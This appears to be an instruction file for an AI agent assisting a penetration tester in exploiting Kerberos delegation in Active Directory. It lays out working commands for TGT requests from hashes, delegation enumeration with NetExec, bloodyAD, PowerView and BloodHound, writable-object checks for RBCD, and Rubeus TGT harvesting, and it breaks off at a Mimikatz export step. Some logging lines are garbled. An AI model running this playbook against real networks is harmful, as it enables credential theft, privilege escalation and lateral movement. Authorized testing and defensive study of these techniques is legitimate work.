Exploits Kerberos delegation misconfigurations for privilege escalation and lateral movement in Active Directory. Covers Unconstrained Delegation (TGT harvesting via coercion), Constrained Delegation (S4U2Self + S4U2Proxy with SPN swapping), and Resource-Based Constrained Delegation (RBCD via writable machine accounts).
You are helping a penetration tester exploit Kerberos delegation misconfigurations for privilege escalation and lateral movement. All testing is under explicit written authorization.
Kerberos-first authentication: All commands default to Kerberos auth via
ccache. Convert credentials to a TGT first, then use -k -no-pass (Impacket),
--use-kcache (NetExec), or /ticket: (Rubeus) throughout.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
[kerberos-delegation] Activated → <target> to the screen on activation.engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
Your return summary must include:
netexec/nxc, optionally Rubeus, bloodyAD,
krbrelayx, SpoolSample/dementor.py/PetitPotamKerberos-first workflow:
getTGT.py DOMAIN/user -hashes :NTHASH
# or with AES (preferred)
getTGT.py DOMAIN/user -aesKey AES256KEY
export KRB5CCNAME=user.ccache
# All subsequent commands use -k -no-pass
Identify delegation-configured accounts. Skip if already provided by ad-discovery or conversation context.
# NetExec
nxc ldap DC.DOMAIN.LOCAL --use-kcache --trusted-for-delegation
# bloodyAD
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get search \
--filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' \
--attr sAMAccountName,userAccountControl
# PowerView (Windows)
Get-DomainComputer -Unconstrained -Properties name,dnshostname
Note: Domain Controllers always have unconstrained delegation. Focus on
non-DC computers with TRUSTED_FOR_DELEGATION.
# NetExec
nxc ldap DC.DOMAIN.LOCAL --use-kcache --delegated-to
# bloodyAD
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get search \
--filter '(msds-allowedtodelegateto=*)' \
--attr sAMAccountName,msds-allowedtodelegateto
# PowerView (Windows)
Get-DomainUser -TrustedToAuth | select name,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto
# BloodHound Cypher
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
# bloodyAD — find computers you can write to
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get writable \
--otype COMPUTER --right WRITE --detail
# Check MachineAccountQuota (for creating attacker computer)
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get object \
'DC=DOMAIN,DC=LOCAL' --attr ms-DS-MachineAccountQuota
# Check existing RBCD
nxc ldap DC.DOMAIN.LOCAL --use-kcache -M rbcd
| Finding | Go To |
|---|---|
| Non-DC computer with unconstrained delegation + local admin | Step 2 |
Service account/computer with msDS-AllowedToDelegateTo | Step 3 |
| Write access to a computer's AD object | Step 4 |
| GenericAll/WriteDACL on computer + MachineAccountQuota > 0 | Step 4 |
Concept: When a user authenticates to an unconstrained delegation host, their TGT is cached in LSASS. With local admin on that host, extract the TGT and impersonate that user anywhere.
Requirements:
# Rubeus — monitor for new TGTs (run before coercion)
.\Rubeus.exe monitor /interval:1 /nowrap
# Mimikatz — export all cached tickets